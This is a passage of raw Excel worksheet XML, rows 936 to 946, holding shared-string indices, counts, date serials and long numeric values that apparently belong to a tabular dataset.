      <c r="B936" t="s">
        <v>5933</v>
      </c>
      <c r="C936" t="s">
        <v>157</v>
      </c>
      <c r="D936" t="s">
        <v>7190</v>
      </c>
      <c r="E936" t="s">
        <v>944</v>
      </c>
      <c r="F936" t="s">
        <v>385</v>
      </c>
      <c r="G936" s="1">
        <v>44049</v>
      </c>
      <c r="H936">
        <v>4632</v>
      </c>
      <c r="I936">
        <v>4632</v>
      </c>
      <c r="J936">
        <v>0</v>
      </c>
      <c r="K936">
        <v>1</v>
      </c>
      <c r="L936">
        <v>0</v>
      </c>
      <c r="M936">
        <v>0</v>
      </c>
      <c r="N936">
        <v>0</v>
      </c>
      <c r="O936">
        <v>0</v>
      </c>
      <c r="P936">
        <v>1</v>
      </c>
      <c r="Q936">
        <v>10</v>
      </c>
      <c r="R936">
        <v>30</v>
      </c>
      <c r="S936">
        <v>0</v>
      </c>
      <c r="T936">
        <v>1</v>
      </c>
      <c r="U936">
        <v>0</v>
      </c>
      <c r="V936">
        <v>30000</v>
      </c>
      <c r="W936">
        <v>0</v>
      </c>
      <c r="X936">
        <v>0</v>
      </c>
      <c r="Y936">
        <v>0</v>
      </c>
      <c r="Z936">
        <v>0</v>
      </c>
      <c r="AA936">
        <v>1000</v>
      </c>
      <c r="AB936">
        <v>10000</v>
      </c>
      <c r="AC936">
        <v>100</v>
      </c>
      <c r="AD936">
        <v>0</v>
      </c>
      <c r="AE936">
        <v>20000</v>
      </c>
      <c r="AF936" t="s">
        <v>5940</v>
      </c>
      <c r="AG936">
        <v>68453</v>
      </c>
      <c r="AH936">
        <v>16</v>
      </c>
      <c r="AJ936">
        <v>237</v>
      </c>
      <c r="AK936" t="s">
        <v>1412</v>
      </c>
      <c r="AL936" t="s">
        <v>1413</v>
      </c>
      <c r="AM936" t="s">
        <v>7191</v>
      </c>
      <c r="AN936" t="s">
        <v>55</v>
      </c>
      <c r="AO936">
        <v>2020</v>
      </c>
      <c r="AP936">
        <v>81355209321</v>
      </c>
      <c r="AQ936" t="s">
        <v>7192</v>
      </c>
      <c r="AR936" t="s">
        <v>5940</v>
      </c>
      <c r="AS936" t="s">
        <v>71</v>
      </c>
      <c r="AT936" t="s">
        <v>58</v>
      </c>
      <c r="AU936">
        <v>1</v>
      </c>
      <c r="AV936">
        <v>1</v>
      </c>
      <c r="AW936">
        <v>15</v>
      </c>
      <c r="AX936">
        <v>58</v>
      </c>
      <c r="AY936">
        <v>2</v>
      </c>
      <c r="AZ936">
        <v>0</v>
      </c>
      <c r="BA936" t="s">
        <v>17094</v>
      </c>
      <c r="BB936">
        <v>0</v>
      </c>
      <c r="BC936">
        <v>0</v>
      </c>
      <c r="BD936" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="937" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A937">
        <v>2827</v>
      </c>
      <c r="B937" t="s">
        <v>7193</v>
      </c>
      <c r="C937" t="s">
        <v>88</v>
      </c>
      <c r="D937" t="s">
        <v>7194</v>
      </c>
      <c r="E937" t="s">
        <v>1245</v>
      </c>
      <c r="F937" t="s">
        <v>7195</v>
      </c>
      <c r="G937" s="1">
        <v>44022</v>
      </c>
      <c r="H937">
        <v>4667</v>
      </c>
      <c r="I937">
        <v>4667</v>
      </c>
      <c r="J937">
        <v>1</v>
      </c>
      <c r="K937">
        <v>0</v>
      </c>
      <c r="L937">
        <v>0</v>
      </c>
      <c r="M937">
        <v>0</v>
      </c>
      <c r="N937">
        <v>0</v>
      </c>
      <c r="O937">
        <v>0</v>
      </c>
      <c r="P937">
        <v>0</v>
      </c>
      <c r="Q937">
        <v>0</v>
      </c>
      <c r="R937">
        <v>19</v>
      </c>
      <c r="S937">
        <v>0</v>
      </c>
      <c r="T937">
        <v>1</v>
      </c>
      <c r="U937">
        <v>4000</v>
      </c>
      <c r="V937">
        <v>0</v>
      </c>
      <c r="W937">
        <v>0</v>
      </c>
      <c r="X937">
        <v>0</v>
      </c>
      <c r="Y937">
        <v>0</v>
      </c>
      <c r="Z937">
        <v>0</v>
      </c>
      <c r="AA937">
        <v>0</v>
      </c>
      <c r="AB937">
        <v>0</v>
      </c>
      <c r="AC937">
        <v>10000</v>
      </c>
      <c r="AD937">
        <v>0</v>
      </c>
      <c r="AE937">
        <v>3000</v>
      </c>
      <c r="AF937" t="s">
        <v>7196</v>
      </c>
      <c r="AG937">
        <v>80233</v>
      </c>
      <c r="AH937">
        <v>17</v>
      </c>
      <c r="AJ937">
        <v>282</v>
      </c>
      <c r="AK937" t="s">
        <v>592</v>
      </c>
      <c r="AL937" t="s">
        <v>1903</v>
      </c>
      <c r="AM937" t="s">
        <v>7197</v>
      </c>
      <c r="AN937" t="s">
        <v>55</v>
      </c>
      <c r="AO937">
        <v>2019</v>
      </c>
      <c r="AP937" t="s">
        <v>7198</v>
      </c>
      <c r="AQ937" t="s">
        <v>7199</v>
      </c>
      <c r="AR937" t="s">
        <v>7200</v>
      </c>
      <c r="AS937" t="s">
        <v>57</v>
      </c>
      <c r="AT937" t="s">
        <v>72</v>
      </c>
      <c r="AU937">
        <v>6</v>
      </c>
      <c r="AV937">
        <v>1</v>
      </c>
      <c r="AW937">
        <v>0</v>
      </c>
      <c r="AX937">
        <v>0</v>
      </c>
      <c r="AY937">
        <v>5</v>
      </c>
      <c r="AZ937">
        <v>2</v>
      </c>
      <c r="BA937" t="s">
        <v>17364</v>
      </c>
      <c r="BB937">
        <v>0</v>
      </c>
      <c r="BC937">
        <v>0</v>
      </c>
      <c r="BD937" t="s">
        <v>11378</v>
      </c>
    </row>
    <row r="938" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A938">
        <v>4824</v>
      </c>
      <c r="B938" t="s">
        <v>7201</v>
      </c>
      <c r="C938" t="s">
        <v>477</v>
      </c>
      <c r="D938" t="s">
        <v>7202</v>
      </c>
      <c r="E938" t="s">
        <v>300</v>
      </c>
      <c r="F938" t="s">
        <v>7203</v>
      </c>
      <c r="G938" s="1">
        <v>44048</v>
      </c>
      <c r="H938">
        <v>4773</v>
      </c>
      <c r="I938">
        <v>4773</v>
      </c>
      <c r="J938">
        <v>1</v>
      </c>
      <c r="K938">
        <v>0</v>
      </c>
      <c r="L938">
        <v>1</v>
      </c>
      <c r="M938">
        <v>0</v>
      </c>
      <c r="N938">
        <v>0</v>
      </c>
      <c r="O938">
        <v>0</v>
      </c>
      <c r="P938">
        <v>0</v>
      </c>
      <c r="Q938">
        <v>0</v>
      </c>
      <c r="R938">
        <v>0</v>
      </c>
      <c r="S938">
        <v>0</v>
      </c>
      <c r="T938">
        <v>0</v>
      </c>
      <c r="U938">
        <v>30</v>
      </c>
      <c r="V938">
        <v>0</v>
      </c>
      <c r="W938">
        <v>3</v>
      </c>
      <c r="X938">
        <v>0</v>
      </c>
      <c r="Y938">
        <v>0</v>
      </c>
      <c r="Z938">
        <v>0</v>
      </c>
      <c r="AA938">
        <v>0</v>
      </c>
      <c r="AB938">
        <v>0</v>
      </c>
      <c r="AC938">
        <v>0</v>
      </c>
      <c r="AD938">
        <v>0</v>
      </c>
      <c r="AE938">
        <v>0</v>
      </c>
      <c r="AF938" t="s">
        <v>7204</v>
      </c>
      <c r="AG938">
        <v>95239</v>
      </c>
      <c r="AH938">
        <v>29</v>
      </c>
      <c r="AJ938">
        <v>382</v>
      </c>
      <c r="AK938" t="s">
        <v>7205</v>
      </c>
      <c r="AL938" t="s">
        <v>7206</v>
      </c>
      <c r="AM938" t="s">
        <v>7207</v>
      </c>
      <c r="AN938" t="s">
        <v>55</v>
      </c>
      <c r="AO938">
        <v>2017</v>
      </c>
      <c r="AP938">
        <v>89637208728</v>
      </c>
      <c r="AQ938" t="s">
        <v>7208</v>
      </c>
      <c r="AR938" t="s">
        <v>7204</v>
      </c>
      <c r="AS938" t="s">
        <v>71</v>
      </c>
      <c r="AT938" t="s">
        <v>58</v>
      </c>
      <c r="AU938">
        <v>0</v>
      </c>
      <c r="AV938">
        <v>0</v>
      </c>
      <c r="AW938">
        <v>3</v>
      </c>
      <c r="AX938">
        <v>0</v>
      </c>
      <c r="AY938">
        <v>7</v>
      </c>
      <c r="AZ938">
        <v>6</v>
      </c>
      <c r="BA938" t="s">
        <v>17429</v>
      </c>
      <c r="BB938">
        <v>0</v>
      </c>
      <c r="BC938" t="s">
        <v>11440</v>
      </c>
      <c r="BD938" t="s">
        <v>11441</v>
      </c>
    </row>
    <row r="939" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A939">
        <v>4803</v>
      </c>
      <c r="B939" t="s">
        <v>7209</v>
      </c>
      <c r="C939" t="s">
        <v>3013</v>
      </c>
      <c r="D939" t="s">
        <v>7210</v>
      </c>
      <c r="E939" t="s">
        <v>49</v>
      </c>
      <c r="F939" t="s">
        <v>7211</v>
      </c>
      <c r="G939" s="1">
        <v>44050</v>
      </c>
      <c r="H939">
        <v>4778</v>
      </c>
      <c r="I939">
        <v>4778</v>
      </c>
      <c r="J939">
        <v>0</v>
      </c>
      <c r="K939">
        <v>0</v>
      </c>
      <c r="L939">
        <v>0</v>
      </c>
      <c r="M939">
        <v>0</v>
      </c>
      <c r="N939">
        <v>0</v>
      </c>
      <c r="O939">
        <v>0</v>
      </c>
      <c r="P939">
        <v>0</v>
      </c>
      <c r="Q939">
        <v>0</v>
      </c>
      <c r="R939">
        <v>1</v>
      </c>
      <c r="S939">
        <v>1</v>
      </c>
      <c r="T939">
        <v>0</v>
      </c>
      <c r="U939">
        <v>0</v>
      </c>
      <c r="V939">
        <v>0</v>
      </c>
      <c r="W939">
        <v>0</v>
      </c>
      <c r="X939">
        <v>0</v>
      </c>
      <c r="Y939">
        <v>0</v>
      </c>
      <c r="Z939">
        <v>0</v>
      </c>
      <c r="AA939">
        <v>0</v>
      </c>
      <c r="AB939">
        <v>0</v>
      </c>
      <c r="AC939">
        <v>1000</v>
      </c>
      <c r="AD939">
        <v>1</v>
      </c>
      <c r="AE939">
        <v>0</v>
      </c>
      <c r="AF939" t="s">
        <v>7212</v>
      </c>
      <c r="AG939">
        <v>29254</v>
      </c>
      <c r="AH939">
        <v>4</v>
      </c>
      <c r="AJ939">
        <v>78</v>
      </c>
      <c r="AK939" t="s">
        <v>7213</v>
      </c>
      <c r="AL939" t="s">
        <v>7214</v>
      </c>
      <c r="AM939" t="s">
        <v>7215</v>
      </c>
      <c r="AN939" t="s">
        <v>55</v>
      </c>
      <c r="AO939">
        <v>2020</v>
      </c>
      <c r="AP939">
        <v>85374138666</v>
      </c>
      <c r="AQ939" t="s">
        <v>7216</v>
      </c>
      <c r="AR939" t="s">
        <v>7212</v>
      </c>
      <c r="AS939" t="s">
        <v>57</v>
      </c>
      <c r="AT939" t="s">
        <v>58</v>
      </c>
      <c r="AU939">
        <v>20</v>
      </c>
      <c r="AV939">
        <v>0</v>
      </c>
      <c r="AW939">
        <v>4</v>
      </c>
      <c r="AX939">
        <v>3</v>
      </c>
      <c r="AY939">
        <v>5</v>
      </c>
      <c r="AZ939">
        <v>4</v>
      </c>
      <c r="BA939" t="s">
        <v>17415</v>
      </c>
      <c r="BB939" t="s">
        <v>16030</v>
      </c>
      <c r="BC939">
        <v>0</v>
      </c>
      <c r="BD939" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="940" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A940">
        <v>4839</v>
      </c>
      <c r="B940" t="s">
        <v>167</v>
      </c>
      <c r="C940" t="s">
        <v>99</v>
      </c>
      <c r="D940" t="s">
        <v>7217</v>
      </c>
      <c r="E940" t="s">
        <v>3643</v>
      </c>
      <c r="F940" t="s">
        <v>7218</v>
      </c>
      <c r="G940" s="1">
        <v>44071</v>
      </c>
      <c r="H940">
        <v>4836</v>
      </c>
      <c r="I940">
        <v>4836</v>
      </c>
      <c r="J940">
        <v>1</v>
      </c>
      <c r="K940">
        <v>1</v>
      </c>
      <c r="L940">
        <v>0</v>
      </c>
      <c r="M940">
        <v>0</v>
      </c>
      <c r="N940">
        <v>0</v>
      </c>
      <c r="O940">
        <v>0</v>
      </c>
      <c r="P940">
        <v>0</v>
      </c>
      <c r="Q940">
        <v>1</v>
      </c>
      <c r="R940">
        <v>1</v>
      </c>
      <c r="S940">
        <v>1</v>
      </c>
      <c r="T940">
        <v>1</v>
      </c>
      <c r="U940">
        <v>300000</v>
      </c>
      <c r="V940">
        <v>1</v>
      </c>
      <c r="W940">
        <v>0</v>
      </c>
      <c r="X940">
        <v>0</v>
      </c>
      <c r="Y940">
        <v>0</v>
      </c>
      <c r="Z940">
        <v>0</v>
      </c>
      <c r="AA940">
        <v>0</v>
      </c>
      <c r="AB940">
        <v>1</v>
      </c>
      <c r="AC940">
        <v>1</v>
      </c>
      <c r="AD940">
        <v>1</v>
      </c>
      <c r="AE940">
        <v>300000</v>
      </c>
      <c r="AF940" t="s">
        <v>172</v>
      </c>
      <c r="AG940">
        <v>14340</v>
      </c>
      <c r="AH940">
        <v>12</v>
      </c>
      <c r="AJ940">
        <v>160</v>
      </c>
      <c r="AK940" t="s">
        <v>268</v>
      </c>
      <c r="AL940" t="s">
        <v>6571</v>
      </c>
      <c r="AM940" t="s">
        <v>7219</v>
      </c>
      <c r="AN940" t="s">
        <v>82</v>
      </c>
      <c r="AO940">
        <v>1989</v>
      </c>
      <c r="AP940" t="s">
        <v>7220</v>
      </c>
      <c r="AQ940" t="s">
        <v>7221</v>
      </c>
      <c r="AR940" t="s">
        <v>178</v>
      </c>
      <c r="AS940" t="s">
        <v>71</v>
      </c>
      <c r="AT940" t="s">
        <v>86</v>
      </c>
      <c r="AU940">
        <v>0</v>
      </c>
      <c r="AV940">
        <v>0</v>
      </c>
      <c r="AW940">
        <v>0</v>
      </c>
      <c r="AX940">
        <v>0</v>
      </c>
      <c r="AY940">
        <v>57</v>
      </c>
      <c r="AZ940">
        <v>42</v>
      </c>
      <c r="BA940" t="s">
        <v>17156</v>
      </c>
      <c r="BB940" t="s">
        <v>16035</v>
      </c>
      <c r="BC940" t="s">
        <v>10031</v>
      </c>
      <c r="BD940">
        <v>0</v>
      </c>
    </row>
    <row r="941" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A941">
        <v>4789</v>
      </c>
      <c r="B941" t="s">
        <v>7222</v>
      </c>
      <c r="C941" t="s">
        <v>3165</v>
      </c>
      <c r="D941" t="s">
        <v>7223</v>
      </c>
      <c r="E941" t="s">
        <v>363</v>
      </c>
      <c r="F941" t="s">
        <v>764</v>
      </c>
      <c r="G941" s="1">
        <v>44070</v>
      </c>
      <c r="H941">
        <v>4853</v>
      </c>
      <c r="I941">
        <v>4853</v>
      </c>
      <c r="J941">
        <v>0</v>
      </c>
      <c r="K941">
        <v>0</v>
      </c>
      <c r="L941">
        <v>0</v>
      </c>
      <c r="M941">
        <v>0</v>
      </c>
      <c r="N941">
        <v>0</v>
      </c>
      <c r="O941">
        <v>0</v>
      </c>
      <c r="P941">
        <v>0</v>
      </c>
      <c r="Q941">
        <v>20</v>
      </c>
      <c r="R941">
        <v>5</v>
      </c>
      <c r="S941">
        <v>1</v>
      </c>
      <c r="T941">
        <v>2</v>
      </c>
      <c r="U941">
        <v>0</v>
      </c>
      <c r="V941">
        <v>0</v>
      </c>
      <c r="W941">
        <v>0</v>
      </c>
      <c r="X941">
        <v>0</v>
      </c>
      <c r="Y941">
        <v>0</v>
      </c>
      <c r="Z941">
        <v>0</v>
      </c>
      <c r="AA941">
        <v>0</v>
      </c>
      <c r="AB941">
        <v>3000</v>
      </c>
      <c r="AC941">
        <v>6000</v>
      </c>
      <c r="AD941">
        <v>1</v>
      </c>
      <c r="AE941">
        <v>15000</v>
      </c>
      <c r="AF941" t="s">
        <v>7224</v>
      </c>
      <c r="AG941">
        <v>99353</v>
      </c>
      <c r="AH941">
        <v>34</v>
      </c>
      <c r="AJ941">
        <v>488</v>
      </c>
      <c r="AK941" t="s">
        <v>7225</v>
      </c>
      <c r="AL941" t="s">
        <v>7226</v>
      </c>
      <c r="AM941" t="s">
        <v>7227</v>
      </c>
      <c r="AN941" t="s">
        <v>68</v>
      </c>
      <c r="AO941">
        <v>2020</v>
      </c>
      <c r="AP941">
        <v>81344370722</v>
      </c>
      <c r="AQ941" t="s">
        <v>7228</v>
      </c>
      <c r="AR941" t="s">
        <v>7224</v>
      </c>
      <c r="AS941" t="s">
        <v>371</v>
      </c>
      <c r="AT941" t="s">
        <v>72</v>
      </c>
      <c r="AU941">
        <v>25</v>
      </c>
      <c r="AV941">
        <v>2</v>
      </c>
      <c r="AW941">
        <v>6</v>
      </c>
      <c r="AX941">
        <v>2</v>
      </c>
      <c r="AY941">
        <v>4</v>
      </c>
      <c r="AZ941">
        <v>3</v>
      </c>
      <c r="BA941" t="s">
        <v>17410</v>
      </c>
      <c r="BB941">
        <v>0</v>
      </c>
      <c r="BC941">
        <v>0</v>
      </c>
      <c r="BD941" t="s">
        <v>11457</v>
      </c>
    </row>
    <row r="942" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A942">
        <v>2738</v>
      </c>
      <c r="B942" t="s">
        <v>7229</v>
      </c>
      <c r="C942" t="s">
        <v>157</v>
      </c>
      <c r="D942" t="s">
        <v>7230</v>
      </c>
      <c r="E942" t="s">
        <v>142</v>
      </c>
      <c r="F942" t="s">
        <v>7231</v>
      </c>
      <c r="G942" s="1">
        <v>44057</v>
      </c>
      <c r="H942">
        <v>4856</v>
      </c>
      <c r="I942">
        <v>4856</v>
      </c>
      <c r="J942">
        <v>0</v>
      </c>
      <c r="K942">
        <v>1</v>
      </c>
      <c r="L942">
        <v>0</v>
      </c>
      <c r="M942">
        <v>0</v>
      </c>
      <c r="N942">
        <v>0</v>
      </c>
      <c r="O942">
        <v>0</v>
      </c>
      <c r="P942">
        <v>0</v>
      </c>
      <c r="Q942">
        <v>0</v>
      </c>
      <c r="R942">
        <v>0</v>
      </c>
      <c r="S942">
        <v>0</v>
      </c>
      <c r="T942">
        <v>0</v>
      </c>
      <c r="U942">
        <v>0</v>
      </c>
      <c r="V942">
        <v>400</v>
      </c>
      <c r="W942">
        <v>0</v>
      </c>
      <c r="X942">
        <v>0</v>
      </c>
      <c r="Y942">
        <v>0</v>
      </c>
      <c r="Z942">
        <v>0</v>
      </c>
      <c r="AA942">
        <v>0</v>
      </c>
      <c r="AB942">
        <v>0</v>
      </c>
      <c r="AC942">
        <v>0</v>
      </c>
      <c r="AD942">
        <v>0</v>
      </c>
      <c r="AE942">
        <v>0</v>
      </c>
      <c r="AF942" t="s">
        <v>7232</v>
      </c>
      <c r="AG942">
        <v>61252</v>
      </c>
      <c r="AH942">
        <v>16</v>
      </c>
      <c r="AJ942">
        <v>242</v>
      </c>
      <c r="AK942" t="s">
        <v>706</v>
      </c>
      <c r="AL942" t="s">
        <v>4784</v>
      </c>
      <c r="AM942" t="s">
        <v>7233</v>
      </c>
      <c r="AN942" t="s">
        <v>55</v>
      </c>
      <c r="AO942">
        <v>2009</v>
      </c>
      <c r="AP942">
        <v>811372322</v>
      </c>
      <c r="AQ942" t="s">
        <v>7234</v>
      </c>
      <c r="AR942" t="s">
        <v>7232</v>
      </c>
      <c r="AS942" t="s">
        <v>179</v>
      </c>
      <c r="AT942" t="s">
        <v>58</v>
      </c>
      <c r="AU942">
        <v>6</v>
      </c>
      <c r="AV942">
        <v>0</v>
      </c>
      <c r="AW942">
        <v>0</v>
      </c>
      <c r="AX942">
        <v>0</v>
      </c>
      <c r="AY942">
        <v>6</v>
      </c>
      <c r="AZ942">
        <v>2</v>
      </c>
      <c r="BA942" t="s">
        <v>17302</v>
      </c>
      <c r="BB942">
        <v>0</v>
      </c>
      <c r="BC942" t="s">
        <v>11478</v>
      </c>
      <c r="BD942">
        <v>0</v>
      </c>
    </row>
    <row r="943" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A943">
        <v>2778</v>
      </c>
      <c r="B943" t="s">
        <v>7235</v>
      </c>
      <c r="C943" t="s">
        <v>458</v>
      </c>
      <c r="D943" t="s">
        <v>7236</v>
      </c>
      <c r="E943" t="s">
        <v>843</v>
      </c>
      <c r="F943" t="s">
        <v>5523</v>
      </c>
      <c r="G943" s="1">
        <v>44075</v>
      </c>
      <c r="H943">
        <v>4873</v>
      </c>
      <c r="I943">
        <v>4873</v>
      </c>
      <c r="J943">
        <v>0</v>
      </c>
      <c r="K943">
        <v>1</v>
      </c>
      <c r="L943">
        <v>0</v>
      </c>
      <c r="M943">
        <v>0</v>
      </c>
      <c r="N943">
        <v>0</v>
      </c>
      <c r="O943">
        <v>0</v>
      </c>
      <c r="P943">
        <v>0</v>
      </c>
      <c r="Q943">
        <v>1</v>
      </c>
      <c r="R943">
        <v>2</v>
      </c>
      <c r="S943">
        <v>0</v>
      </c>
      <c r="T943">
        <v>1</v>
      </c>
      <c r="U943">
        <v>1000</v>
      </c>
      <c r="V943">
        <v>1000</v>
      </c>
      <c r="W943">
        <v>0</v>
      </c>
      <c r="X943">
        <v>0</v>
      </c>
      <c r="Y943">
        <v>0</v>
      </c>
      <c r="Z943">
        <v>0</v>
      </c>
      <c r="AA943">
        <v>0</v>
      </c>
      <c r="AB943">
        <v>100</v>
      </c>
      <c r="AC943">
        <v>1000</v>
      </c>
      <c r="AD943">
        <v>0</v>
      </c>
      <c r="AE943">
        <v>1000</v>
      </c>
      <c r="AF943" t="s">
        <v>7235</v>
      </c>
      <c r="AG943">
        <v>29100</v>
      </c>
      <c r="AH943">
        <v>5</v>
      </c>
      <c r="AJ943">
        <v>154</v>
      </c>
      <c r="AK943" t="s">
        <v>3358</v>
      </c>
      <c r="AL943" t="s">
        <v>3358</v>
      </c>
      <c r="AM943" t="s">
        <v>7237</v>
      </c>
      <c r="AN943" t="s">
        <v>68</v>
      </c>
      <c r="AO943">
        <v>2006</v>
      </c>
      <c r="AP943" t="s">
        <v>7238</v>
      </c>
      <c r="AQ943">
        <v>81378289933</v>
      </c>
      <c r="AR943" t="s">
        <v>7235</v>
      </c>
      <c r="AS943" t="s">
        <v>71</v>
      </c>
      <c r="AT943" t="s">
        <v>72</v>
      </c>
      <c r="AU943">
        <v>0</v>
      </c>
      <c r="AV943">
        <v>0</v>
      </c>
      <c r="AW943">
        <v>0</v>
      </c>
      <c r="AX943">
        <v>0</v>
      </c>
      <c r="AY943">
        <v>13</v>
      </c>
      <c r="AZ943">
        <v>2</v>
      </c>
      <c r="BA943" t="s">
        <v>17323</v>
      </c>
      <c r="BB943" t="s">
        <v>15930</v>
      </c>
      <c r="BC943" t="s">
        <v>9638</v>
      </c>
      <c r="BD943" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="944" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A944">
        <v>4837</v>
      </c>
      <c r="B944" t="s">
        <v>7239</v>
      </c>
      <c r="C944" t="s">
        <v>157</v>
      </c>
      <c r="D944" t="s">
        <v>7240</v>
      </c>
      <c r="E944" t="s">
        <v>142</v>
      </c>
      <c r="F944" t="s">
        <v>7241</v>
      </c>
      <c r="G944" s="1">
        <v>44090</v>
      </c>
      <c r="H944">
        <v>4879</v>
      </c>
      <c r="I944">
        <v>4879</v>
      </c>
      <c r="J944">
        <v>2</v>
      </c>
      <c r="K944">
        <v>0</v>
      </c>
      <c r="L944">
        <v>2</v>
      </c>
      <c r="M944">
        <v>0</v>
      </c>
      <c r="N944">
        <v>0</v>
      </c>
      <c r="O944">
        <v>0</v>
      </c>
      <c r="P944">
        <v>0</v>
      </c>
      <c r="Q944">
        <v>7</v>
      </c>
      <c r="R944">
        <v>1</v>
      </c>
      <c r="S944">
        <v>0</v>
      </c>
      <c r="T944">
        <v>0</v>
      </c>
      <c r="U944">
        <v>2000</v>
      </c>
      <c r="V944">
        <v>0</v>
      </c>
      <c r="W944">
        <v>4000</v>
      </c>
      <c r="X944">
        <v>0</v>
      </c>
      <c r="Y944">
        <v>0</v>
      </c>
      <c r="Z944">
        <v>0</v>
      </c>
      <c r="AA944">
        <v>0</v>
      </c>
      <c r="AB944">
        <v>4000</v>
      </c>
      <c r="AC944">
        <v>800</v>
      </c>
      <c r="AD944">
        <v>0</v>
      </c>
      <c r="AE944">
        <v>0</v>
      </c>
      <c r="AF944" t="s">
        <v>7242</v>
      </c>
      <c r="AG944">
        <v>66382</v>
      </c>
      <c r="AH944">
        <v>16</v>
      </c>
      <c r="AJ944">
        <v>230</v>
      </c>
      <c r="AK944" t="s">
        <v>2692</v>
      </c>
      <c r="AL944" t="s">
        <v>3948</v>
      </c>
      <c r="AM944" t="s">
        <v>7243</v>
      </c>
      <c r="AN944" t="s">
        <v>55</v>
      </c>
      <c r="AO944">
        <v>2019</v>
      </c>
      <c r="AP944">
        <v>87853656993</v>
      </c>
      <c r="AQ944" t="s">
        <v>7244</v>
      </c>
      <c r="AR944" t="s">
        <v>7242</v>
      </c>
      <c r="AS944" t="s">
        <v>71</v>
      </c>
      <c r="AT944" t="s">
        <v>58</v>
      </c>
      <c r="AU944">
        <v>26</v>
      </c>
      <c r="AV944">
        <v>1</v>
      </c>
      <c r="AW944">
        <v>20</v>
      </c>
      <c r="AX944">
        <v>26</v>
      </c>
      <c r="AY944">
        <v>2</v>
      </c>
      <c r="AZ944">
        <v>3</v>
      </c>
      <c r="BA944" t="s">
        <v>17263</v>
      </c>
      <c r="BB944">
        <v>0</v>
      </c>
      <c r="BC944" t="s">
        <v>9536</v>
      </c>
      <c r="BD944">
        <v>0</v>
      </c>
    </row>
    <row r="945" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A945">
        <v>4422</v>
      </c>
      <c r="B945" t="s">
        <v>4780</v>
      </c>
      <c r="C945" t="s">
        <v>477</v>
      </c>
      <c r="D945" t="s">
        <v>7245</v>
      </c>
      <c r="E945" t="s">
        <v>142</v>
      </c>
      <c r="F945" t="s">
        <v>7246</v>
      </c>
      <c r="G945" s="1">
        <v>44067</v>
      </c>
      <c r="H945">
        <v>4902</v>
      </c>
      <c r="I945">
        <v>4902</v>
      </c>
      <c r="J945">
        <v>1</v>
      </c>
      <c r="K945">
        <v>0</v>
      </c>
      <c r="L945">
        <v>4</v>
      </c>
      <c r="M945">
        <v>0</v>
      </c>
      <c r="N945">
        <v>0</v>
      </c>
      <c r="O945">
        <v>0</v>
      </c>
      <c r="P945">
        <v>0</v>
      </c>
      <c r="Q945">
        <v>0</v>
      </c>
      <c r="R945">
        <v>4</v>
      </c>
      <c r="S945">
        <v>0</v>
      </c>
      <c r="T945">
        <v>0</v>
      </c>
      <c r="U945">
        <v>20000</v>
      </c>
      <c r="V945">
        <v>0</v>
      </c>
      <c r="W945">
        <v>16000</v>
      </c>
      <c r="X945">
        <v>0</v>
      </c>
      <c r="Y945">
        <v>0</v>
      </c>
      <c r="Z945">
        <v>0</v>
      </c>
      <c r="AA945">
        <v>0</v>
      </c>
      <c r="AB945">
        <v>0</v>
      </c>
      <c r="AC945">
        <v>1000</v>
      </c>
      <c r="AD945">
        <v>0</v>
      </c>
      <c r="AE945">
        <v>0</v>
      </c>
      <c r="AF945" t="s">
        <v>4783</v>
      </c>
      <c r="AG945">
        <v>95545</v>
      </c>
      <c r="AH945">
        <v>29</v>
      </c>
      <c r="AJ945">
        <v>383</v>
      </c>
      <c r="AK945" t="s">
        <v>1339</v>
      </c>
      <c r="AL945" t="s">
        <v>7247</v>
      </c>
      <c r="AM945" t="s">
        <v>7248</v>
      </c>
      <c r="AN945" t="s">
        <v>55</v>
      </c>
      <c r="AO945">
        <v>2017</v>
      </c>
      <c r="AP945">
        <v>8123583402</v>
      </c>
      <c r="AQ945" t="s">
        <v>7249</v>
      </c>
      <c r="AR945" t="s">
        <v>4783</v>
      </c>
      <c r="AS945" t="s">
        <v>71</v>
      </c>
      <c r="AT945" t="s">
        <v>58</v>
      </c>
      <c r="AU945">
        <v>25</v>
      </c>
      <c r="AV945">
        <v>1</v>
      </c>
      <c r="AW945">
        <v>10</v>
      </c>
      <c r="AX945">
        <v>15</v>
      </c>
      <c r="AY945">
        <v>3</v>
      </c>
      <c r="AZ945">
        <v>2</v>
      </c>
      <c r="BA945" t="s">
        <v>17054</v>
      </c>
      <c r="BB945" t="s">
        <v>16046</v>
      </c>
      <c r="BC945" t="s">
        <v>11642</v>
      </c>
      <c r="BD945">
        <v>0</v>
      </c>
    </row>
    <row r="946" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A946">
        <v>4813</v>
      </c>
      <c r="B946" t="s">
        <v>7250</v>
      </c>
      <c r="C946" t="s">
        <v>74</v>
      </c>
      <c r="D946" t="s">
        <v>7251</v>
      </c>
      <c r="E946" t="s">
        <v>2184</v>
      </c>
      <c r="F946" t="s">
        <v>7252</v>
      </c>
      <c r="G946" s="1">
        <v>44137</v>
      </c>
      <c r="H946">
        <v>4909</v>
      </c>
      <c r="I946">
        <v>4909</v>
      </c>
      <c r="J946">
        <v>1</v>
      </c>
      <c r="K946">
        <v>0</v>
      </c>
      <c r="L946">
        <v>1</v>
      </c>
      <c r="M946">
        <v>0</v>
      </c>
      <c r="N946">
        <v>0</v>
      </c>
      <c r="O946">
        <v>0</v>
      </c>
      <c r="P946">
        <v>0</v>
      </c>
      <c r="Q946">
        <v>0</v>
      </c>
      <c r="R946">
        <v>0</v>
      </c>
      <c r="S946">
        <v>0</v>
      </c>
      <c r="T946">
        <v>0</v>
      </c>
      <c r="U946">
        <v>350000</v>
      </c>
      <c r="V946">
        <v>0</v>
      </c>
      <c r="W946">
        <v>4000</v>
      </c>
      <c r="X946">
        <v>0</v>
      </c>
      <c r="Y946">
        <v>0</v>
      </c>
      <c r="Z946">
        <v>0</v>
      </c>
      <c r="AA946">
        <v>0</v>
      </c>
      <c r="AB946">
        <v>0</v>
      </c>
      <c r="AC946">
        <v>0</v>
      </c>
      <c r="AD946">
        <v>0</v>
      </c>
      <c r="AE946">
